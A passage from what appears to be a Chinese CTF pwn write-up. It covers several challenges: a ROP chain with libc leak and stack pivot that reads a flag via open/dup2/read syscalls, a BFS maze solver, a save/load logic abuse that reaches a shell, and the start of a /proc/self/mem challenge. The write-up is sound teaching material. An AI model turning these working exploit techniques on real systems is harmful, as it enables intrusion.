[rbp-0x40];   pop rbp 0x404640</span></span><br><span class="line">pl1 += p64(back_addr)</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.send(pl1)</span><br><span class="line">p.recvline()</span><br><span class="line"></span><br><span class="line">pl2 = p64(<span class="number">0x404638</span> + <span class="number">0x40</span>) <span class="comment"># 0x404600 pl3&#x27;s writing point: 0x404638</span></span><br><span class="line">pl2 += p64(pop_rdi_ret) <span class="comment"># 0x404608 mov rsp,rbp; pop rbp</span></span><br><span class="line">pl2 += p64(read_got) </span><br><span class="line">pl2 += p64(puts_plt)</span><br><span class="line">pl2 += p64(back_addr)</span><br><span class="line">pl2 += <span class="string">b&#x27;./flag\x00\x00&#x27;</span> <span class="comment"># 28</span></span><br><span class="line">pl2 += p64(<span class="number">0x404640</span> + <span class="number">0x40</span>) <span class="comment"># 30 pl4&#x27;s writing point</span></span><br><span class="line">pl2 += p64(back_addr)</span><br><span class="line">pl2 += p64(rbp_addr - <span class="number">0x40</span>) <span class="comment"># 0x404640  pop rbp =&gt; pl2&#x27;s writing point</span></span><br><span class="line">pl2 += p64(leave_ret)</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.send(pl2)</span><br><span class="line">p.recvline()</span><br><span class="line"></span><br><span class="line">read_addr = u64(p.recvuntil(<span class="string">b&#x27;\n&#x27;</span>,drop=<span class="literal">True</span>).ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="comment"># print(hex(read_addr))</span></span><br><span class="line">libc_base = read_addr - libc.symbols[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line"><span class="comment"># print(hex(libc_base))</span></span><br><span class="line">open_addr = libc_base + libc.symbols[<span class="string">&#x27;open&#x27;</span>]</span><br><span class="line">pop_rax_ret = libc_base + <span class="built_in">next</span>(libc.search(asm(<span class="string">&#x27;pop rax; ret&#x27;</span>)))</span><br><span class="line">pop_rsi_ret = libc_base + <span class="built_in">next</span>(libc.search(asm(<span class="string">&#x27;pop rsi; ret&#x27;</span>)))</span><br><span class="line">pop_rdx_r12_ret = libc_base + <span class="number">0x119431</span> </span><br><span class="line">syscall_addr = libc_base + <span class="built_in">next</span>(libc.search(asm(<span class="string">&#x27;syscall; ret&#x27;</span>)))</span><br><span class="line">flag_addr = <span class="number">0x404628</span></span><br><span class="line"></span><br><span class="line">pl3 = p64(pop_rdi_ret) <span class="comment"># 0x404638</span></span><br><span class="line">pl3 += p64(<span class="number">0</span>) <span class="comment"># 0x404640</span></span><br><span class="line">pl3 += p64(pop_rsi_ret)</span><br><span class="line">pl3 += p64(<span class="number">0x404678</span>) <span class="comment"># 这个位置是关键，要设置为read的返回地址</span></span><br><span class="line">pl3 += p64(pop_rdx_r12_ret)</span><br><span class="line">pl3 += p64(<span class="number">0x200</span>)</span><br><span class="line">pl3 += p64(<span class="number">0</span>)</span><br><span class="line">pl3 += p64(read_plt) <span class="comment"># 70</span></span><br><span class="line">pl3 += p64(<span class="number">0x404638</span> - <span class="number">8</span>) <span class="comment"># pop rbp</span></span><br><span class="line">pl3 += p64(leave_ret)</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.send(pl3)</span><br><span class="line"></span><br><span class="line">pl4 = p64(pop_rdi_ret) </span><br><span class="line">pl4 += p64(flag_addr)</span><br><span class="line">pl4 += p64(pop_rax_ret)</span><br><span class="line">pl4 += p64(<span class="number">2</span>) </span><br><span class="line">pl4 += p64(pop_rsi_ret)</span><br><span class="line">pl4 += p64(<span class="number">0</span>)</span><br><span class="line">pl4 += p64(syscall_addr) <span class="comment"># open</span></span><br><span class="line">pl4 += p64(pop_rax_ret)</span><br><span class="line">pl4 += p64(<span class="number">33</span>) </span><br><span class="line">pl4 += p64(pop_rdi_ret)</span><br><span class="line">pl4 += p64(<span class="number">3</span>)</span><br><span class="line">pl4 += p64(pop_rsi_ret)</span><br><span class="line">pl4 += p64(<span class="number">0</span>)</span><br><span class="line">pl4 += p64(syscall_addr) <span class="comment"># dup2</span></span><br><span class="line">pl4 += p64(pop_rdi_ret) </span><br><span class="line">pl4 += p64(<span class="number">0</span>) <span class="comment"># 0 -&gt; 3</span></span><br><span class="line">pl4 += p64(pop_rsi_ret)</span><br><span class="line">pl4 += p64(<span class="number">0x404100</span>) </span><br><span class="line">pl4 += p64(pop_rdx_r12_ret)</span><br><span class="line">pl4 += p64(<span class="number">0x30</span>)</span><br><span class="line">pl4 += p64(<span class="number">0</span>)</span><br><span class="line">pl4 += p64(pop_rax_ret)</span><br><span class="line">pl4 += p64(<span class="number">0</span>)</span><br><span class="line">pl4 += p64(syscall_addr) <span class="comment"># read</span></span><br><span class="line">pl4 += p64(pop_rdi_ret)</span><br><span class="line">pl4 += p64(<span class="number">0x404100</span>)</span><br><span class="line">pl4 += p64(puts_plt) <span class="comment"># puts</span></span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line">p.send(pl4)</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="/../css/img/w4/1729593863557.png"></p>
<h3 id="Maze-Rust"><a href="#Maze-Rust" class="headerlink" title="Maze_Rust"></a>Maze_Rust</h3><p>开了PIE</p>
<p><img src="/../css/img/w4/1729467061430.png"></p>
<p>一个rust写的程序，不如看汇编了</p>
<p>rax存一个函数地址，运行后发现是一个生成迷宫的函数，那么call的就是走迷宫了</p>
<p><img src="/../css/img/w4/1729467224479.png"></p>
<p>没溢出，那漏洞点应该不在这</p>
<p><img src="/../css/img/w4/1729467745669.png"></p>
<p>call调用了一个got表中的函数，那它应该是一个结束的东西</p>
<p><img src="/../css/img/w4/1729467813086.png" alt="1729467813086"></p>
<p>所以应该分析第一个函数</p>
<p><img src="/../css/img/w4/1729468468887.png"></p>
<p><img src="/../css/img/w4/1729468443814.png"></p>
<p>逆向！</p>
<p>转字符串：选中按a即可</p>
<p>有mprotect，那么栈溢出后调用注入shellcode即可</p>
<p>七百多行，逆累了</p>
<p>发现迷宫不需要逆向是可以变化的，只不过出发点是P，终点是G</p>
<p><img src="/../css/img/w4/1729506919976.png"></p>
<p><img src="/../css/img/w4/1729506946377.png" alt="1729506946377"></p>
<p>字体调小点弄到同一页就不用受这个苦了</p>
<p>试试通过迷宫</p>
<p><img src="/../css/img/w4/1729507040653.png"></p>
<p>沉默了……所以这题……和pwn有什么关系呢？2不需要，721不需要，逆向不需要，栈溢出不需要，mprotect不需要？</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> p64</span><br><span class="line"><span class="keyword">from</span> collections <span class="keyword">import</span> deque</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process(&quot;./maze_rust/Maze_Rust&quot;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;39.106.48.123&#x27;</span>, <span class="number">39979</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&quot;3: Handle The Maze\n&quot;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">3</span>)) <span class="comment"># check v87(rbp - 178h)-&gt; wrong. use rsp+130h</span></span><br><span class="line"><span class="comment"># p.recvuntil(b&quot;3&quot;)</span></span><br><span class="line"><span class="built_in">str</span> = p.recvuntil(<span class="string">b&#x27;You can quit the game with &quot;q&quot;\n&#x27;</span>)</span><br><span class="line"><span class="comment">#str为ida中使用快捷键[shift+e]提取到的数据, 如果提取的是string literal则加上引号视作字符串，如果是C array(decimal)则加上中括号视作列表</span></span><br><span class="line"><span class="built_in">str</span> = <span class="built_in">str</span>.decode(<span class="string">&#x27;utf-8&#x27;</span>) <span class="comment">#将bytes转换为str</span></span><br><span class="line"><span class="comment"># print(str)</span></span><br><span class="line"></span><br><span class="line">s = <span class="number">0</span> <span class="comment">#s用作索引访问str, 供下面tmp列表取值</span></span><br><span class="line"><span class="comment">#分析题目后设置迷宫的行列</span></span><br><span class="line">row =  <span class="number">71</span></span><br><span class="line">col =  <span class="number">72</span></span><br><span class="line"></span><br><span class="line">maze = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(row):</span><br><span class="line">    tmp = []</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(col):</span><br><span class="line">        tmp.append(<span class="built_in">str</span>[s])</span><br><span class="line">        s+=<span class="number">1</span></span><br><span class="line">    maze.append(tmp) <span class="comment">#凑一行添加一行到迷宫中</span></span><br><span class="line"><span class="built_in">print</span>(maze)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">path_len = <span class="number">0x7fffffff</span><span class="comment">#如果题目未给出终点坐标，则一定会指定路径的长度，在此处修改路径长度，否则请保留path_len的极大值</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">#进行BFS寻找路径</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">bfs</span>(<span class="params">start, end, barrier</span>):</span><br><span class="line">    directions = [(<span class="number">0</span>, <span class="number">1</span>), (<span class="number">1</span>, <span class="number">0</span>), (<span class="number">0</span>, -<span class="number">1</span>), (-<span class="number">1</span>, <span class="number">0</span>)] <span class="comment"># 定义四个方向的移动</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(maze)):<span class="comment">#获取起点和终点在列表中的索引</span></span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(maze[i])):</span><br><span class="line">            <span class="keyword">if</span>(maze[i][j] == start):</span><br><span class="line">                start = (i, j)</span><br><span class="line">            <span class="keyword">if</span>(maze[i][j] == end):</span><br><span class="line">                end = (i, j)</span><br><span class="line">    <span class="comment">#以下均是bfs算法套路</span></span><br><span class="line">    queue = deque()</span><br><span class="line">    queue.append((start, [start]))  <span class="comment"># (当前位置, 路径)</span></span><br><span class="line">    visited = <span class="built_in">set</span>()</span><br><span class="line">    visited.add(start)</span><br><span class="line">    <span class="keyword">while</span> queue:</span><br><span class="line">        position, path = queue.popleft()</span><br><span class="line">        <span class="keyword">if</span> position == end:</span><br><span class="line">            <span class="keyword">return</span> path</span><br><span class="line">        <span class="keyword">elif</span> <span class="built_in">len</span>(path)==path_len:</span><br><span class="line">            <span class="keyword">return</span> path</span><br><span class="line">        <span class="keyword">for</span> d <span class="keyword">in</span> directions:</span><br><span class="line">            next_position = (position[<span class="number">0</span>] + d[<span class="number">0</span>], position[<span class="number">1</span>] + d[<span class="number">1</span>])</span><br><span class="line">            <span class="keyword">if</span> <span class="number">0</span> &lt;= next_position[<span class="number">0</span>] &lt; <span class="built_in">len</span>(maze) <span class="keyword">and</span> <span class="number">0</span> &lt;= next_position[<span class="number">1</span>] &lt; <span class="built_in">len</span>(maze[<span class="number">0</span>]) <span class="keyword">and</span> \</span><br><span class="line">               maze[next_position[<span class="number">0</span>]][next_position[<span class="number">1</span>]] != barrier <span class="keyword">and</span> next_position <span class="keyword">not</span> <span class="keyword">in</span> visited:</span><br><span class="line">                queue.append((next_position, path + [next_position]))</span><br><span class="line">                visited.add(next_position)</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">#执行BFS搜索并打印结果</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="comment">#maze[起点x坐标][起点y坐标] = &#x27;S&#x27; #如果题目给了起点终点的坐标，在这里直接给起点和终点添加特征</span></span><br><span class="line">    <span class="comment">#maze[终点x坐标][终点y坐标] = &#x27;E&#x27; </span></span><br><span class="line">    </span><br><span class="line">    path = bfs(<span class="string">&#x27;P&#x27;</span>, <span class="string">&#x27;G&#x27;</span>, <span class="string">&#x27;#&#x27;</span>) <span class="comment">#bfs函数传入参数代表起点、终点、障碍的特征(若题目给出的数据无特征, 手动添加特征即可, 通常障碍是1也有可能是0或其它字符如&#x27;#&#x27;)</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;移动路径坐标：&quot;</span>, path)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;移动路径方位：&#123;&quot;</span>, end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span> ,<span class="built_in">len</span>(path)):</span><br><span class="line">        x1, y1, x2, y2 = path[i - <span class="number">1</span>][<span class="number">0</span>], path[i - <span class="number">1</span>][<span class="number">1</span>], path[i][<span class="number">0</span>], path[i][<span class="number">1</span>]</span><br><span class="line">        <span class="keyword">if</span>(x1 &gt; x2):<span class="comment">#上</span></span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;w&quot;</span>, end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        <span class="keyword">elif</span>(x1 &lt; x2):<span class="comment">#下</span></span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;s&quot;</span>, end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        <span class="keyword">elif</span>(y1 &gt; y2):<span class="comment">#左</span></span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;a&quot;</span>, end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        <span class="keyword">elif</span>(y1 &lt; y2):<span class="comment">#右</span></span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;d&quot;</span>, end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;&#125;&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<h3 id="Sign-in-srand-time-0"><a href="#Sign-in-srand-time-0" class="headerlink" title="Sign in srand(time(0))"></a>Sign in srand(time(0))</h3><p>main函数有个system(“&#x2F;bin&#x2F;sh”)，也就是说目标是使v13&gt;1145</p>
<p>v10是输入</p>
<p><img src="/../css/img/w4/1729688552212.png"></p>
<h4 id="错误思路-覆盖分数"><a href="#错误思路-覆盖分数" class="headerlink" title="错误思路 覆盖分数"></a>错误思路 覆盖分数</h4><p>无论是汇编还是gdb调试都只有v10与6的比较</p>
<p><img src="/../css/img/w4/1729688640864.png"></p>
<p><img src="/../css/img/w4/1729688466869.png"></p>
<p>ja是无符号大于则跳转，也就是说如果大于6就可以去比较v13了</p>
<p>[rbp-0x50]的确大于0x479，但这里赋值的是eax，需要低32位大于0x479</p>
<p><img src="/../css/img/w4/1729688793270.png"></p>
<p>这里没办法通过name来进行覆盖，因为它在堆段，栈上存的是这个字符串的地址</p>
<p>尝试改变传输的数据量</p>
<p><code>pl = b&#39;adminnnn&#39; * 0x9999</code></p>
<p><img src="/../css/img/w4/1729689848206.png"></p>
<p><code>pl = b&#39;adminnnn&#39; * 0x99999</code></p>
<p><img src="/../css/img/w4/1729692189381.png"></p>
<p>难不成，可以由堆溢到栈？</p>
<p>这个不是单调的，经过多次尝试大概限定在以下范围</p>
<p><img src="/../css/img/w4/1729693131036.png"></p>
<p>但是我发现在.data段永远以010结尾，而要覆盖需要地址以700结尾</p>
<p>可能还是要进入目录中的选项看能不能改到这个位置</p>
<p><img src="/../css/img/w4/1729726653276.png"></p>
<p>输入点（06:0030）与要覆盖位置(lc:00e0)距离位0xb0</p>
<p><img src="/../css/img/w4/1729726784846.png"></p>
<p>不覆盖，这里的输入也是在堆段</p>
<p>C++输入都在堆段？</p>
<p>继续尝试</p>
<p>jle是有符号跳转</p>
<p><img src="/../css/img/w4/1729736077868.png"></p>
<p>发现不断发1选项可以让RAX变负</p>
<p>原本是0，一次变0xffffffec，也就是一次减二十</p>
<p>所以这个v13对应的是分数</p>
<p>如果要把这个数一直减到正，不知道会不会连接超时</p>
<p>所以考虑如何加分</p>
<p>对手是random产生的伪随机，那么循环一定次数，看要多少次得出定值，然后根据这个定值发送能赢的对手即可</p>
<p>但是这个随机种子一无法覆盖，二无法撞库（因为是随机数与人名的对应关系我不清除）</p>
<p>保存文件和更改文件是个好东西，保存之后直接修改文件内容，但只能本地……吗？不行，因为python在本地执行可以打开文件并修改，远程是要传输命令的</p>
<p><img src="/../css/img/w4/1729740268692.png"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 本地玩玩</span></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;6. Save file\n&#x27;</span>)</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">6</span>))</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Player data has saved to aaaaaaab.json\n&#x27;</span>)</span><br><span class="line">p.sendline()</span><br><span class="line"></span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">&quot;name&quot;</span>: <span class="string">&quot;aaaaaaab&quot;</span>,</span><br><span class="line">    <span class="string">&quot;sorce&quot;</span>: <span class="number">99999988</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;aaaaaaab.json&#x27;</span>, <span class="string">&#x27;w&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    json.dump(data, file, indent=<span class="number">4</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;6. Save file\n&#x27;</span>)</span><br><span class="line">pause()</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">5</span>))</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Player data has loaded from aaaaaaab.json\n&#x27;</span>)</span><br><span class="line"><span class="comment"># p.sendline()</span></span><br></pre></td></tr></table></figure>

<p>如果循环次数足够多，并且挑一个胜率高的人，那么是不是有可能能赢？是的但还是输得多</p>
<p>考虑把负数逆成正吧</p>
<p><img src="/../css/img/w4/1729744592450.png"></p>
<p>remote大概要发42年，放弃</p>
<p>看提示……</p>
<p><img src="/../css/img/w4/1729752618491.png"></p>
<p>考虑C++机制</p>
<p>C和C++混合编译</p>
<p><img src="/../css/img/w4/1729755147714.png"></p>
<p>还是不对</p>
<h6 id="与本题无关但未来可能用得上的C-与canary"><a href="#与本题无关但未来可能用得上的C-与canary" class="headerlink" title="与本题无关但未来可能用得上的C++与canary"></a>与本题无关但未来可能用得上的C++与canary</h6><p> <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/15461?time__1311=GqjxnDuAqYq05DK5YK0=Qitai=PQmO0GbD#toc-2">C++  __cxa_throw 处理canary</a> </p>
<p> <a target="_blank" rel="noopener" href="https://www.cnblogs.com/CH13hh/p/18132811">通过程序try&#x2F;catch抛出异常之绕过canary pwn121 - CH13hh - 博客园 (cnblogs.com)</a> </p>
<h4 id="错误思路-ctype时间撞库"><a href="#错误思路-ctype时间撞库" class="headerlink" title="错误思路 ctype时间撞库"></a>错误思路 ctype时间撞库</h4><p>仔细看扣分函数逻辑，发现这里有一个随机数的比较，这个随机数是可能可以被预测的（因为是数）</p>
<p>Berserker可以打败所有人，是得分概率最大的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">libc = cdll.LoadLibrary(<span class="string">&#x27;libc.so.6&#x27;</span>)</span><br><span class="line">libc.srand(libc.time(<span class="number">0</span>))</span><br><span class="line">a = libc.rand()</span><br></pre></td></tr></table></figure>

<p>不行，时间对不上</p>
<h4 id="正确思路-利用程序本身逻辑漏洞"><a href="#正确思路-利用程序本身逻辑漏洞" class="headerlink" title="正确思路 利用程序本身逻辑漏洞"></a>正确思路 利用程序本身逻辑漏洞</h4><p>如果加分的时候保存文档，扣分就加载文档，那么不就可以让分数一直增加吗？</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *       </span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process(&#x27;./Signin/Signin&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;101.200.139.65&#x27;</span>, <span class="number">26645</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Enter your name: &#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">b&#x27;MoonCancer&#x27;</span>)</span><br><span class="line"><span class="built_in">max</span> = <span class="number">0</span></span><br><span class="line">score = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#------if the program was interruptted, load the data -----------------</span></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;6. Save file\n&#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">5</span>))</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Player data has loaded from MoonCancer.json\n&#x27;</span>)</span><br><span class="line">p.sendline()     </span><br><span class="line">p.recvuntil(<span class="string">b&#x27;6. Save file\n&#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">4</span>))</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Your sorce: &#x27;</span>)</span><br><span class="line"><span class="built_in">max</span> = <span class="built_in">int</span>(p.recvuntil(<span class="string">b&#x27;\n&#x27;</span>,drop = <span class="literal">True</span>),<span class="number">10</span>)  </span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">max</span>)</span><br><span class="line"><span class="comment">#----------------------------------------------------------------------</span></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">max</span> &gt; <span class="number">1145</span>:</span><br><span class="line">    p.recvuntil(<span class="string">b&#x27;Your are master Master!\n&#x27;</span>)</span><br><span class="line">    p.interactive()</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p.sendline(<span class="string">b&#x27;\n&#x27;</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x200</span>):</span><br><span class="line">        p.recvuntil(<span class="string">b&#x27;6. Save file\n&#x27;</span>)</span><br><span class="line">        p.sendline(<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">        p.recvuntil(<span class="string">b&#x27;Choose your class: &#x27;</span>)</span><br><span class="line">        <span class="comment"># byte_i = i.to_bytes(8, &#x27;little&#x27;)  # Convert i to a single byte</span></span><br><span class="line">        p.sendline(<span class="string">b&#x27;Berserker&#x27;</span>)</span><br><span class="line">        p.recvuntil(<span class="string">b&#x27;Now you have &#x27;</span>)</span><br><span class="line">        score = <span class="built_in">int</span>(p.recvuntil(<span class="string">b&#x27; sorce\n&#x27;</span>,drop = <span class="literal">True</span>),<span class="number">10</span>)</span><br><span class="line">        <span class="comment"># print(score)</span></span><br><span class="line">        <span class="keyword">if</span> score &gt; <span class="built_in">max</span>:</span><br><span class="line">            <span class="built_in">max</span> = score</span><br><span class="line">            <span class="keyword">if</span> <span class="built_in">max</span> &gt; <span class="number">1145</span>:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            p.sendline(<span class="string">b&#x27;\n&#x27;</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&#x27;6. Save file\n&#x27;</span>)</span><br><span class="line">            p.sendline(<span class="built_in">str</span>(<span class="number">6</span>))</span><br><span class="line">            p.recvuntil(<span class="string">b&#x27;Player data has saved to MoonCancer.json\n&#x27;</span>)</span><br><span class="line">            p.sendline()</span><br><span class="line">        <span class="keyword">else</span> :</span><br><span class="line">            p.sendline(<span class="string">b&#x27;\n&#x27;</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&#x27;6. Save file\n&#x27;</span>)</span><br><span class="line">            p.sendline(<span class="built_in">str</span>(<span class="number">5</span>))</span><br><span class="line">            p.recvuntil(<span class="string">b&#x27;Player data has loaded from MoonCancer.json\n&#x27;</span>)</span><br><span class="line">            p.sendline()</span><br><span class="line">    p.sendline(<span class="string">b&#x27;\n&#x27;</span>)                </span><br><span class="line">    p.recvuntil(<span class="string">b&#x27;Your are master Master!\n&#x27;</span>)</span><br><span class="line">    <span class="comment"># pause()</span></span><br><span class="line">    <span class="comment"># p.sendline(str(7))</span></span><br><span class="line">    p.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="/../css/img/w4/1729930232241.png"></p>
<h3 id="MakeHero-proc-self-mem-lseek-write"><a href="#MakeHero-proc-self-mem-lseek-write" class="headerlink" title="MakeHero proc&#x2F;self&#x2F;mem lseek write"></a>MakeHero proc&#x2F;self&#x2F;mem lseek write</h3><h4 id="无ld，更换libc"><a href="#无ld，更换libc" class="headerlink" title="无ld，更换libc"></a>无ld，更换libc</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">patchelf --replace-needed libc.so.6 /home/c/Desktop/2024ns/w4/makehero/libc.so.6 /home/c/Desktop/2024ns/w4/makehero/MakeHero</span><br><span class="line">strings libc.so.6|grep ubuntu</span><br><span class="line"><span class="comment"># 在glibc-all-in-one中找对应版本</span></span><br><span class="line">patchelf --set-interpreter /home/c/Desktop/2024ns/w4/makehero/ld-linux-x86-64.so.2 /home/c/Desktop/2024ns/w4/makehero/MakeHero</span><br></pre></td></tr></table></figure>

<p>保护全开</p>
<p><img src="/../css/img/w4/1729508463201.png"></p>
<p>但canary只在init函数中用到了，main和open_mem都没有</p>
<p>逆向一下main函数</p>
<p><img src="/../css/img/w4/1732021751808.png"></p>
<p>init函数输出四个.bss地址</p>
<p><img src="/../css/img/w4/1729508369810.png"></p>
<ul>
<li><strong>&#x2F;proc&#x2F;self&#x2F;maps</strong></li>
</ul>
<p>&#x2F;proc&#x2F;self&#x2F;maps包含的内容是当前进程的内存映射关系，可通过读取该文件来得到内存数据映射的地址。</p>
<p>控制输入数据，进open_mem</p>
<ul>
<li><strong>&#x2F;proc&#x2F;self&#x2F;mem</strong></li>
</ul>
